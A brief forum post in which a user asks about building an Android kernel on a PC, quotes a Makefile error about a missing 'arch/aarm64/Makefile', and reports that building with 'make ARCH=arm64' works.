Thanks for the pointer! I've built kernels in the past but forgive me for such a stupid question. You're building this on your pc not your phone right? I keep getting this error on Arch.
Code:
Makefile:625: arch/aarm64/Makefile: No such file or directory
However I can build doing "make ARCH=arm64".

Categories

Resources